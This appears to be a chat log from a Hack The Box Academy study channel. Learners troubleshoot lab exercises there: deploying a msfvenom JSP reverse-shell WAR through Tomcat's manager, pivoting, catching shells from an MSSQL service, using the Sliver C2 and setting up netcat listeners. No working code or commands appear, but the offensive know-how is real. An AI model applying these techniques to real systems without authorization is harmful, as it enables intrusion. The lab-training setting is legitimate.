btw how long did it take to find the right creds?
It's possible, but it would take much longer
i generated a jsp reverse shell file format war
Did you upload it successfully?
Do you have the error?
then i tried to generate the file using msfvenom
i didn't really get an error. just when i click deploy on the tomcat manager app, the server times out
and when you try to navigate to the file, is it not there?
yes
I'm trying to think of something to say that would not spoil it for you
ah ok
But you're on the right track
ok good to know
What page did you upload it to?
What page on the tomcat website did you upload the file to
/manager/html
Have you completed Attacking Common Applications? The steps outlined there worked.
It should work then, that's weird
try creating the war file manually instead of using msfvenom
hmmm
is that at me?
thing is the I don't seem to be able to upload the file
i haven't done attacking common applications
that's a bit later in the path
could try changing regions maybe
or try a different browser if you think its on your end
maybe i'm using the wrong browser
well i'm using the tools on the machine i'm rdp'd into
i used the browser in the burpsuite
maybe i should use the hostname of the server and not the ip when i browse to the url
strange
i get error reading from socket
basically looks like a timeout
as if the upload link behind the upload button doesn't work
give up for today
back tomorrow 🙂
Providing screenshots of the commands etc would make the help easier
footprinting SMTP was a battle jesus
feel like that module really missed the mark with explaining the enumeration phase
considering the amount of other people asking in the discord history and forum posts other people would agree
Fair. I'll post some screenshots tomorrow. Got tired of spinning wheels for tonight
anyone else constantly having to reboot target VM's as they die after like 5 minutes
been happening for the past hour for me
my nmap scans will go from showing 5 open ports instantly to none and can only be shown using -Pn and they're listed as filtered.. as soon as i reboot the VM its fixed but then happens again after 5 min
Try a different VPN server?
still matters, changing the vpn region changes the pwnbox's region as well
vpn on a vm has the same result
oh i can change the region on my pwnbox?
let me try that thanks
yep
Try to keep VPN and pwnbox near each other, but the VPN selected does have an impact with the pwnbox.
good to know i thought they were completely independent, thank you
It has an impact on the target
Not on the pwnbox
Pwnbox region impacts pwnbox
Vpn region impacts targets
that's done the trick nicely not a single disconnect since
completed footprinting IMAP/POP3s woop woop that was a fun one
IMAP syntax is funky
It's silly
i am glad you agree
I ended up saving a link to a couple imap articles
*pwnbox experience
Is there a known server issue right now? The VM's keep crashing
I'll try tcp vpn pack
I had an open support ticket with HTB about the US servers (vpn and pwnbox) not performing well, not spawning targets, etc and they told me that they have several reports of this issue and that the best option currently was to switch regions to EU while they address the problem. That solved the odd issues I was experiencing. No word on any fix or anything atm. I moved to the EU-5 vpn and its solid.
Use a tool that can find passwords for you. Remember that tools may give different results based on whatever user context you're running under.
did you use those tools under all the users you have access to?
yes i did
Currently doing the Attacking Enterprise Network module and I keep losing tons of time trying to pivot via the first host. I've tried using Ligolo, Chisel, SSH and sometimes it works great but other times I can browse to the webpage on the internal network but trying to log in to the admin panel just hangs, tried resetting the target a few times, tried different ports and still having this issue. Anyone have any tips?
First, we have no idea what your attacker IP is, how you generated the .exe, etc. so its hard to say what you're doing is correct. Second, you can check the version or patches to see if it's vulnerable to your exploit, there may be another attack path you need to take instead.
the attacker IP is the kali host i have to ssh into
im in the mssql service right now
everytime i try and certutil a file as nt service\mssql$sqlexpress it becomes a 0 byte file
do you have admin rights on sql01?
no im trying to get a shell
im thru as the service but cant catch a shell
to impersonate
send me a dm
this was quite a journey i must say
I've finally solved fatty. kudos to @placid lotus for the eu vpn server tip; it was smooth sailing from there. I think it's safe to say, if there is a challenge like fatty on the exam, 10 days won't likely be enough to solve it.
unless its identical, or there is an online post about the specific exploit steps.
It was a cool lab though.
anybody know how to fix this problem of sliver?
🫡
nice job that's a huge module
we love AD
What version you running? How'd you install it? What is the host OS? Do you have Internet access for the sliver server?
Also, might just want to look at the sliver logs and see what's up there
i got it, it just that i can't name beacon same name twice
making sure you really understand the module, it will save you in CPTS
It's...a behemoth.
behemoth in grandblue XD?
That's a way to put it.
I took notes throughout the AD module on everything, so I think I will pass.
But yeah I just can't believe how much attack surface there is.
That's my favorite module so far
yeahhhhh imma go back thru and do it again
If you have notes...
yeah holy moley like it was alot alot
Did you start knowing nothing of AD?
But at the end of the day, it's just a lot of things to test for.
it's a big mountain to climb if you don't have AD experience
no i knew a bit, but stuff like the acl abuse, and use of powerview was new to me
yeah there was a bit that i knew, but seeing the kerberoasting and other attack surfaces was really fun
Nice.
I like the SQLi module the most myself so far... With pivoting a close second.
I'm doing the shells module and im trying to connect to the target with netcat but instead of connecting successfully, I just get (unknown) insert ip and port (?) open. ChatGPT says its something with the dns or something, how do I fix this?
Module:
Section:
Description:
Link of Section:
tryna follow this format when asking question so you can make it easier for me to know where you at
Module: Shells and Payloads
Section: Bind Shells
Description: I'm doing the shells module and im trying to connect to the target with netcat but instead of connecting successfully, I just get (unknown) insert ip and port (?) open. ChatGPT says its something with the dns or something, how do I fix this?
Link of Section: https://academy.hackthebox.com/module/115/section/1105
Hello. Do the new academy modules mean HTB will be offering a Red Team certification next?
dm
whenever HTB have the cube talk, you can ask them
Cube talk? I think it's obvious to infer HTB is coming for CRTO market share
nothing is confirmed. your chance to ask staff will be this upcoming cube talk on friday
Maybe I will, thank you!
Expect the staff to either not know as it's outside their wheelhouse, or deflect as they are not ready to announce yet during the cube talk. They have stated that they are working on releasing more certs but have not included specifics.
Based on the release of other modules and certs in the past, it's probably a safe bet that these new modules will be part of a new cert path related to red teaming. I'm sure we'll all find out soon enough.
Module: Using Web Proxies > Repeating Requests
Am trying to use Burpsuite to do cd public so I can look inside that directory for the flag, but its not working. I just get no response and if I ls again it seems that im back in the root directory, any ideas?
You're not going to be able to "change directories" because you're not really sitting at a terminal/console. Instead think about it like you are running commands, so instead of "cd public" you'd want to list the contents of the folder or something like "ls public"
that's a fun one
Why have antivirus software?
it's built into the OS
This chapter asked me to upload something, but as soon as I did, I got killed
yeah that one trips up a lot of people
by the time i got to the module i was prepared for it because so many people mention it here
in msfconsole, doing a reverse shell, should we start the nc/netcat listening to port first, or after executing the reverse shell command? (i.e php reverse shell command)
does executing the reverse shell command before listening to port will fail? (i.e the port maybe closed, idk)
you run the listener before running the payload
the payload has to connect back to something, else it'll most likely fail
I see, thanks
Why can't I access it even though I've configured it?
Hey anyone else having issues connecting to VPN?
What VPN server?
eu academy2
Hmm Lemme try that, Ive changed around a bit but always get a connection timed out
This caused me to change my operating system last week, but it's working fine now.
I pinged 8.8.8.8 and I get a reply but pinging the server IP doesnt really give me a reply
Its weird because I can connect to the Hackthebox App VPN (competitive VPN)
maybe machine ping closed 😄 try -Pn :d
target machine issue?
Using The Metasploit Framework > Meterpreter
The target machine is unresponsive. It spawns, but I get nothing from my enumerations or any attacks.
Works maybe 1/50. Idk what’s going on. Other machines spawn and work fine.
maybe create ticket htb support